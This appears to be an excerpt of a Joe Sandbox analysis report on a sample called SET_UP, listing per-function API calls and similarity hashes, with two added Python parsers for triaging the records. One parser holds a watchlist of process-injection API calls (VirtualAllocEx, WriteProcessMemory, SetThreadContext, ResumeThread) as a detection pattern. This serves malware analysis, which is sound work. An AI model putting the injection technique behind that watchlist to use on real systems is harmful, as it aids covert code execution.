• Instruction Fuzzy Hash: A1015E3095015EA6CB10DF41CA56BFEB7A0AB08744F50641BB517661C1DBFC5E01D7AE
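The function records above repeat the same layout for every routine the IDA plugin exported (an APIs block, an empty Strings block, the memory dump source, the snapshot file, and a Similarity block whose String ID packs the referenced strings with `$` separators). When a report has hundreds of these, triage is easier against a structured view: which functions call which APIs, which API calls were inlined from a callee, and which strings each function touches. The parser below is an added example and is not part of the Joe Sandbox report or its tooling; the record layout and line shapes are taken from the records visible on this page, the field names are mine, and the embedded sample is constructed from two of this page's records (the subcall lines, the link text `Download File` that the web export glues onto `Associated:` lines, and the `$`-packed strings are all kept so the parser is exercised on them).

```python
"""Parse per-function records exported by the Joe Sandbox IDA plugin (added example)."""
import re
from dataclasses import dataclass, field
from typing import Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Two shapes appear on the page:  "• CopyRect.USER32(?,?), ref: 00411393"
# and (no argument list)          "• __EH_prolog.LIBCMT ref: 0041134A",
# optionally prefixed with        "Part of subcall function 0043D300: "
API_LINE = re.compile(
    r"^• (?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
KEY_VALUE = re.compile(r"^• (?P<key>[^:]+):\s?(?P<value>.*)$")
DOWNLOAD_RESIDUE = "Download File"   # link text the web export appends to 'Associated:' lines


@dataclass
class ApiCall:
    function: str
    module: str
    args: list[str]
    ref: str                       # call-site address exactly as printed (hex string)
    subcall_of: Optional[str]      # set when the plugin inlined the call from a callee


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    ids: dict[str, str] = field(default_factory=dict)   # the Similarity block, key -> value
    source_file: str = ""
    associated: list[str] = field(default_factory=list)
    snapshot: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the export into records; on this page every record opens with an 'APIs' header."""
    records: list[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()          # the export carries heavy leading indentation
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue                # text before the first record
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                sub = m["sub"].upper() if m["sub"] else None
                current.apis.append(ApiCall(m["func"], m["module"], args, m["ref"].upper(), sub))
            continue
        m = KEY_VALUE.match(line)
        if not m:
            continue
        key, value = m["key"].strip(), m["value"].strip()
        if section == "Memory Dump Source":
            if key == "Source File":
                current.source_file = value
            elif key == "Associated":
                current.associated.append(value.removesuffix(DOWNLOAD_RESIDUE).strip())
        elif section == "Joe Sandbox IDA Plugin" and key == "Snapshot File":
            current.snapshot = value
        elif section == "Similarity":
            current.ids[key] = value
            if key == "String ID":      # strings are '$'-joined; a leading '$' is an empty entry
                current.strings = [s for s in value.split("$") if s]
    return records


def functions_calling(records: list[FunctionRecord], api_name: str) -> list[int]:
    """Indices of records that call api_name directly (inlined subcalls are excluded)."""
    return [i for i, r in enumerate(records)
            if any(a.function == api_name and a.subcall_of is None for a in r.apis)]


# Constructed sample: two records copied from this page, trimmed to a few lines each.
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 00430DF9
• PathFileExistsW.SHLWAPI(?), ref: 00430E09
• GetPrivateProfileIntW.KERNEL32(Playlist,NumberOfEntries,000000FF,?), ref: 00430E23
• GetPrivateProfileStringW.KERNEL32(Playlist,?,00508FBC,?,00000400,?), ref: 00430E7F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: PrivateProfile$ExistsFileH_prologPathString
• String ID: File%d$NumberOfEntries$Playlist
• API String ID: 2426676720-2421212926
APIs
• SendMessageW.USER32(?,00000418,00000000,0000FFFF), ref: 004351EA
• FindResourceW.KERNEL32(00000000,000000A2,PNG,00000004,00000000,?,00000003), ref: 0043520D
  • Part of subcall function 0043D300: LoadResource.KERNEL32(?,?,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D332
Similarity
• String ID: $Open Files$Open video/audio files$PNG
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, [f"{a.module}!{a.function}" for a in rec.apis], rec.strings)
```

Feed it the whole exported section (the text of this page, indentation and all) and the result is one `FunctionRecord` per routine; `functions_calling` then answers questions such as which functions call `FindResourceW` without being fooled by the same API appearing only inside an inlined callee. The `ref` and `subcall_of` values are kept as the hex strings the plugin printed rather than converted to integers, so they can be pasted straight back into the disassembler.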
APIs
• CopyRect.USER32(?,?), ref: 00435EEC
• __ftol.LIBCMT ref: 00436011
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004360F5
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CopyRectWindow__ftol
• String ID:
• API String ID: 3839655261-0
• Opcode ID: 700972eaf8edf778206dba809705d6846c5fb10439c32cfdc58b0e5cf80b2d1a
• Instruction ID: a450c9e9ba4d3b5d2a0ee8267f44a5a806dc86290e5b90dd084969aa71c09d7c
• Opcode Fuzzy Hash: 700972eaf8edf778206dba809705d6846c5fb10439c32cfdc58b0e5cf80b2d1a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A713871E0060AEBCB05DFA9D985AEEBBF5FF48300F25852AE116B3250DB35A941CF54
APIs
• CompareStringW.KERNEL32(00000000,00000000,004DE718,00000001,004DE718,00000001,74DEE860,0050BD48,00000000), ref: 0049DE96
• CompareStringW.KERNEL32(?,?,?,?,?,00000000,74DEE860,0050BD48,00000000), ref: 0049DEFC
• CompareStringA.KERNEL32(00000000,00000000,0050924C,00000001,0050924C,00000001), ref: 0049DF12
• WideCharToMultiByte.KERNEL32(0050BD48,00000220,?,?,00000000,00000000,00000000,00000000,74DEE860,0050BD48,00000000), ref: 0049DF55
• WideCharToMultiByte.KERNEL32(00000000,00000220,?,?,00000000,?,00000000,00000000), ref: 0049DFAF
• WideCharToMultiByte.KERNEL32(00000000,00000220,?,00000000,00000000,00000000,00000000,00000000), ref: 0049DFC7
• WideCharToMultiByte.KERNEL32(00000000,00000220,?,00000000,?,?,00000000,00000000), ref: 0049E01F
• CompareStringA.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,00000000), ref: 0049E03D
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: ByteCharCompareMultiStringWide
• String ID:
• API String ID: 1117519366-0
• Opcode ID: 1723099261e2f855305d3ba94827713a4e96adcebfcd6913523f9c74664fdf7a
• Instruction ID: fcabd9272890576457675657e90a87de67c046ac15c0adebc4b977e21cca898b
• Opcode Fuzzy Hash: 1723099261e2f855305d3ba94827713a4e96adcebfcd6913523f9c74664fdf7a
• Instruction Fuzzy Hash: F7519C71900249AFCF219F56CC86DEF7FB9FB49750F14452AF911A22A4C3398861DB68
APIs
• lstrlenA.KERNEL32(?,FFFFFFFF,(:D,?,(:D,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 004817DA
• lstrlenA.KERNEL32(?), ref: 0048182A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: lstrlen
• String ID: (:D$A$C$L$Unrecognized equation type for pCAL chunk$p
• API String ID: 1659193697-4162268544
• Opcode ID: e6e0fa9d6e82c228bbfe70818ee2976e76d96bdd23f300df3ad03b17472a0d6b
• Instruction ID: a9d95abe66abacb02c49bb5d8727a07796f5718b8f8fa9e1a8049b4b37e09456
• Opcode Fuzzy Hash: e6e0fa9d6e82c228bbfe70818ee2976e76d96bdd23f300df3ad03b17472a0d6b
• Instruction Fuzzy Hash: 6B41A471508345AFD300EB65C881D7FBBE9EFC5708F04492EF98587212E779E90A87A6
APIs
  • Part of subcall function 004811D0: lstrlenA.KERNEL32(?), ref: 004811F6
• lstrlenA.KERNEL32(?,?,?,?,00000000,FFFFFFFF,(:D,?,?,004765B3,(:D,?,?,?,?,00000080), ref: 00481606
• lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,FFFFFFFF,(:D,?,?,004765B3,(:D,?,?,?,?), ref: 0048161E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: lstrlen
• String ID: (:D$Empty language field in iTXt chunk$T$X$i$t
• API String ID: 1659193697-1893270040
• Opcode ID: 3f693e8e12cbc06b59fe700401624cc80798cdf25a2b26da242cee3bd6c30eca
• Instruction ID: 26db86621ff04119048766ae96a8f10222d902c9ed215997fb0102fbd2704650
• Opcode Fuzzy Hash: 3f693e8e12cbc06b59fe700401624cc80798cdf25a2b26da242cee3bd6c30eca
• Instruction Fuzzy Hash: F2416E70509380AFD311EB15C885EAFBBEDEFD5308F44491EF58493212E779990587AB
APIs
• GetClientRect.USER32(?,0000E900), ref: 004B42DF
• BeginDeferWindowPos.USER32(00000008), ref: 004B42ED
• GetTopWindow.USER32(?), ref: 004B42FF
• GetDlgCtrlID.USER32(00000000), ref: 004B430E
• SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 004B4340
• GetWindow.USER32(00000000,00000002), ref: 004B4349
• CopyRect.USER32(?,0000E900), ref: 004B4365
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
• String ID:
• API String ID: 3332788312-0
• Opcode ID: 7aabe33229b05208a5d5bedc059be095f1a893cbbd27735e39cfec8304ff8d8d
• Instruction ID: 03fbe17e5ea3d6c22ea244eb1fe9d170d32424f658381c01f5e673967bed88e9
• Opcode Fuzzy Hash: 7aabe33229b05208a5d5bedc059be095f1a893cbbd27735e39cfec8304ff8d8d
• Instruction Fuzzy Hash: 76414871A00209EFCF14DF99D9848EEB7F5FF88304B18416AF901A7251D7389E50DBA9
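The "API ID" under each Similarity block is the key the report uses to match a function against functions seen in other samples, so it is worth being able to recompute it from the "APIs" lines when pivoting on it. The parser below is an added example and is not part of the Joe Sandbox report or of its IDA plugin. It reads call lines exactly as they are printed above (including the "Part of subcall function" form) and rebuilds the key; the derivation it uses (CamelCase tokens of the API names, the A/W suffix and any token shorter than four characters dropped, tokens grouped by frequency, most frequent group first, alphabetical within a group, groups joined with "$") is inferred from the API IDs visible on this page and is an assumption, not Joe Sandbox's documented algorithm. The injection watchlist is likewise an assumed set, included because the report's signatures flag a suspended-process creation and the record that follows calls ResumeThread. The sample records are copied from this page as constructed test input.

```python
"""Rebuild a Joe Sandbox 'API ID' similarity key from a record's 'APIs' lines.

Added example. The tokenisation rule is inferred from the API IDs shown in
this report; it is an assumption, not Joe Sandbox's published algorithm.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One call line as printed under "APIs", e.g.
#   • GetClientRect.USER32(?,0000E900), ref: 004B42DF
#   • Part of subcall function 004811D0: lstrlenA.KERNEL32(?), ref: 004811F6
_API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})\s*$"
)
# CamelCase pieces ("Wide", "Char", "To") plus lowercase/underscore names ("lstrlen", "__ftol").
_TOKEN = re.compile(r"[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*")
_MIN_TOKEN = 4  # assumption: this is what drops Get/Set/Pos/Top/Dlg/ID and the A/W suffix

# Assumed watchlist: calls that together make up suspended-process injection.
INJECTION_APIS = {"CreateProcessW", "CreateProcessA", "VirtualAllocEx",
                  "WriteProcessMemory", "SetThreadContext", "ResumeThread", "NtResumeThread"}


@dataclass(frozen=True)
class ApiCall:
    api: str                # exported name as called, e.g. "CompareStringW"
    module: str             # module the import resolved to, e.g. "KERNEL32"
    args: tuple             # raw argument tokens; "?" means the sandbox could not resolve it
    ref: int                # address of the call site in the dumped image
    subcall: Optional[int]  # callee address when the call happens one level down


def parse_api_lines(text: str) -> list:
    """Return the ApiCall records found in a report excerpt; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue  # "APIs", "Strings" and other headers
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def api_id(calls) -> str:
    """Most frequent tokens first, alphabetical within a frequency, groups joined by '$'."""
    counts = Counter(tok for c in calls for tok in _TOKEN.findall(c.api)
                     if len(tok) >= _MIN_TOKEN)
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def injection_hits(calls) -> list:
    """Watchlist calls in call-site order, for quick triage of one record."""
    return [c for c in calls if c.api in INJECTION_APIS]


# Sample records copied from this report (constructed test input for the parser).
WINDOW_RECORD = """APIs
• GetClientRect.USER32(?,0000E900), ref: 004B42DF
• BeginDeferWindowPos.USER32(00000008), ref: 004B42ED
• GetTopWindow.USER32(?), ref: 004B42FF
• GetDlgCtrlID.USER32(00000000), ref: 004B430E
• SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 004B4340
• GetWindow.USER32(00000000,00000002), ref: 004B4349
• CopyRect.USER32(?,0000E900), ref: 004B4365
"""
COMPARE_RECORD = """APIs
• CompareStringW.KERNEL32(00000000,00000000,004DE718,00000001,004DE718,00000001,74DEE860,0050BD48,00000000), ref: 0049DE96
• CompareStringW.KERNEL32(?,?,?,?,?,00000000,74DEE860,0050BD48,00000000), ref: 0049DEFC
• CompareStringA.KERNEL32(00000000,00000000,0050924C,00000001,0050924C,00000001), ref: 0049DF12
• WideCharToMultiByte.KERNEL32(0050BD48,00000220,?,?,00000000,00000000,00000000,00000000,74DEE860,0050BD48,00000000), ref: 0049DF55
• WideCharToMultiByte.KERNEL32(00000000,00000220,?,?,00000000,?,00000000,00000000), ref: 0049DFAF
• WideCharToMultiByte.KERNEL32(00000000,00000220,?,00000000,00000000,00000000,00000000,00000000), ref: 0049DFC7
• WideCharToMultiByte.KERNEL32(00000000,00000220,?,00000000,?,?,00000000,00000000), ref: 0049E01F
• CompareStringA.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,00000000), ref: 0049E03D
"""
ITXT_RECORD = """APIs
  • Part of subcall function 004811D0: lstrlenA.KERNEL32(?), ref: 004811F6
• lstrlenA.KERNEL32(?,?,?,?,00000000,FFFFFFFF,(:D,?,?,004765B3,(:D,?,?,?,?,00000080), ref: 00481606
• lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,FFFFFFFF,(:D,?,?,004765B3,(:D,?,?,?,?), ref: 0048161E
"""
MENU_RECORD = """APIs
• GetSystemMenu.USER32(?,00000000,00000000,00000001,00000000), ref: 0040DEC9
• DeleteMenu.USER32(?,0000F120,00000000,00000000), ref: 0040DEEB
• DeleteMenu.USER32(?,0000F020,00000000), ref: 0040DEF9
• DeleteMenu.USER32(?,0000F030,00000000), ref: 0040DF07
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040DF5B
• PathFileExistsW.SHLWAPI(?), ref: 0040DF67
• PathMakePrettyW.SHLWAPI(?), ref: 0040DF8E
• ResumeThread.KERNEL32(?,0040DFE4,?,00000000,00000004,00000000,00000000,?), ref: 0040DFCF
"""

if __name__ == "__main__":
    for name, rec in (("window", WINDOW_RECORD), ("compare", COMPARE_RECORD),
                      ("itxt", ITXT_RECORD), ("menu", MENU_RECORD)):
        calls = parse_api_lines(rec)
        hits = ", ".join(f"{c.api}@{c.ref:08X}" for c in injection_hits(calls)) or "-"
        print(f"{name:8s} API ID: {api_id(calls):50s} watchlist: {hits}")
```

Run the file as-is to see the recomputed keys next to the watchlist hits; for the two records above they come out as ByteCharCompareMultiStringWide and Window$Rect$BeginClientCopyCtrlDeferMessageSend, and the GetSystemMenu record that follows is the only one with a watchlist hit (ResumeThread at 0040DFCF). A record whose API ID is ambiguous, such as the plain "lstrlen" shared by the two libpng-string functions, still needs the String ID or the opcode hash to pivot on; the API ID alone is too coarse there.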
APIs
• GetSystemMenu.USER32(?,00000000,00000000,00000001,00000000), ref: 0040DEC9
• DeleteMenu.USER32(?,0000F120,00000000,00000000), ref: 0040DEEB
• DeleteMenu.USER32(?,0000F020,00000000), ref: 0040DEF9
• DeleteMenu.USER32(?,0000F030,00000000), ref: 0040DF07
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040DF5B
• PathFileExistsW.SHLWAPI(?), ref: 0040DF67
• PathMakePrettyW.SHLWAPI(?), ref: 0040DF8E
• ResumeThread.KERNEL32(?,0040DFE4,?,00000000,00000004,00000000,00000000,?), ref: 0040DFCF
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Menu$Delete$Path$ExistsFileMakeMessagePrettyResumeSendSystemThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2590489476-0
                                                                                                                                                                                                  • Opcode ID: 879a105cec56165ca79214af896d245a003f67b06647fd70dd72bf31cb2f6334
                                                                                                                                                                                                  • Instruction ID: dac6016bbcae5ac864d71d9366641cc86e34084f98c5d0085b01a170d4bfcc75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 879a105cec56165ca79214af896d245a003f67b06647fd70dd72bf31cb2f6334
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F431B430600601AFCB20AB66CD49E9BBBF9EF84704F10447EF14AA72A1DB759945CB68
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00414B8C
                                                                                                                                                                                                  • GetCapture.USER32 ref: 00414BC4
                                                                                                                                                                                                  • SetCapture.USER32(?,00000000), ref: 00414BDB
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,00000003,?), ref: 00414C08
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,00000002,?), ref: 00414C1F
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,00000001,?), ref: 00414C36
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,00000000,?), ref: 00414C4C
                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000C8,00000000), ref: 00414C65
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessagePost$Capture$ParentTimer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1786324385-0
                                                                                                                                                                                                  • Opcode ID: 19f8ddfacc75d5605a355e8c7328b13cefebe2f5a41d319e653d9cf151247c31
                                                                                                                                                                                                  • Instruction ID: d9c92ef1d233b1973696056cd25800c528584823eebb1f6194e0154ad6fb0c0f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19f8ddfacc75d5605a355e8c7328b13cefebe2f5a41d319e653d9cf151247c31
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31A571311B04FFEB315F61DC09FDA7B75EB44704F50882AF702952A0D77998919B68
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: (:D$A$C$Can't write sCAL (buffer too small)$L$s
                                                                                                                                                                                                  • API String ID: 1659193697-41905255
                                                                                                                                                                                                  • Opcode ID: ce75f71c5be14d8d6f581b1601b49c4aaa4f927c7415f820c48da183aced58f9
                                                                                                                                                                                                  • Instruction ID: 3a4876cceb81d0ed29f83344d7e844f1c21219816d4e69b61a6989ccc5da8a10
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce75f71c5be14d8d6f581b1601b49c4aaa4f927c7415f820c48da183aced58f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8211E97260C3484FC705EB68A8419AFFBD9EFD5214F44085EF98557341D6AAAA0CC3B3
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FB,000000FB), ref: 004099F3
                                                                                                                                                                                                    • Part of subcall function 004C0464: SetBkColor.GDI32(A5A5D47D,?), ref: 004C046E
                                                                                                                                                                                                    • Part of subcall function 004C0464: ExtTextOutW.GDI32(A5A5D47D,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004C0484
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?,?), ref: 00409AB6
                                                                                                                                                                                                    • Part of subcall function 0041A69B: __ftol.LIBCMT ref: 0041A719
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 00409BC5
